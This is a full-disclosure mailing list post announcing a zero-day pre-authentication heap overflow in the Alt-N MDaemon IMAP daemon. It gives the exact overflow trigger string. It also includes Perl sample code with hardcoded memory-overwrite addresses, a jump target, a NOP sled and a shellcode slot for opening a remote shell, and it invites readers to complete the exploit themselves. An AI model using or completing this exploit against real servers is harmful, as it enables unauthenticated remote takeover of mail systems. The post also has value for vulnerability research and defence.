MDAEMON LATEST VERSION PREAUTH *REMOTE ROOT HOLE* zeroday discovered by kcope kingcope[at]gmx.net !!! shouts to alex,wY!,bogus,revoguard,adizeone Description There's a remotely exploitable preauthentication hole in Alt-N MDaemon. It is a Heap Overflow in the IMAP Daemon. It can be triggered by sending the following attack string: a001 "[X]\r\n Look specifically at the " it is important :) [X] consists of f.e. 99555 Z's to reach the 4 byte overwrite. Now one can use the 4 byte overwrite in some PEB pointer overwrite to open a remote shell. UnhandledExceptionFilter is also possible I think. No exploit is delivered at this time, figure it out yourself (use the PEB Lock) :) Sample code: $where = "\x4c\x14\xed\x77"; # UnhandledExceptionFilter 77ED144C #$where = "\x20\xf0\xfd\x7f"; # PEB Lock Pointer 7FFDF000 $what = "\x3d\xb9\x82\x02"; # JMP EDX 03bfcb9A $nops = "A" x 100; $a = $nops . $shellcode . ("Z" x (0x2006-length($shellcode)-length($nops))) . $what . $where . ("Z" x (0x184AC - 0x200A - 12)); print $sock "a001 \"$a\r\n"; close($sock); Best Regards, kcope _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/